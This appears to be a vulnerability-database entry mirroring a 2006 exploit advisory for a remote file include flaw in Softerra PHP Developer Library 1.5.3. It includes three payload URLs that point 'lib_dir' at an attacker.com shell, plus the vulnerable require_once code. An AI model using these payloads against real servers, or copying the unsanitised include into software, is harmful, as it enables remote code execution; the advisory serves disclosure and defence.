Softerra. PHP Developer Library

vendor:

PHP Developer Library

by:

7,5

CVSS

HIGH

Remote File Include Vulnerability

CWE

Product Name: PHP Developer Library

Affected Version From: 1.5.3

Affected Version To: 1.5.3

Patch Exists: No

Related CWE: N/A

CPE: a:softerra:php_developer_library

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Softerra. PHP Developer Library

A remote file include vulnerability exists in Softerra. PHP Developer Library. The vulnerability is caused due to the 'lib_dir' parameter in the 'registry.lib.php', 'sqlcompose.lib.php' and 'sqlsearch.lib.php' scripts not properly sanitized before being used to include files. This can be exploited to include arbitrary files from remote locations by e.g. using a URL in the 'lib_dir' parameter. Successful exploitation requires that 'allow_url_include' is set to 'on' in the php.ini.

Mitigation:

Disable the 'allow_url_include' directive in the php.ini configuration file.

Source

Exploit-DB raw data:

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ Softerra. PHP Developer Library ]                 #
#                                                                
# Class:     Remote File Include Vulnerability                  #
# Patch:     Unavailable                                        #
# Published  2006/10/12                                         #
# Remote:    Yes                                                
# Local:     No                            			#
# Type:      High                                               #
# Site:      http://www.softerra.com/products_php-library.htm   #
# Author:    MP
# Contact:   mp01010@yahoo.com                    		#
#                                				#
#################################################################

Exploit:

http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/registry.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlcompose.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlsearch.lib.php?lib_dir=http://attacker.com/shell?


Vuln Files:

registry.lib.php
sqlcompose.lib.php
sqlsearch.lib.php


Vuln Code:
#
../lib/registry.lib.php

<? ...
require_once ($lib_dir . "sqlstorage.class.php");
... ?>
##
../lib/sqlcompose.lib.php

<? ...
require_once ($lib_dir . "array.lib.php");
... ?>

##
../lib/sqlsearch.lib.php

<? ...
require_once ($lib_dir . "array.lib.php");
... ?>

# milw0rm.com [2006-10-12]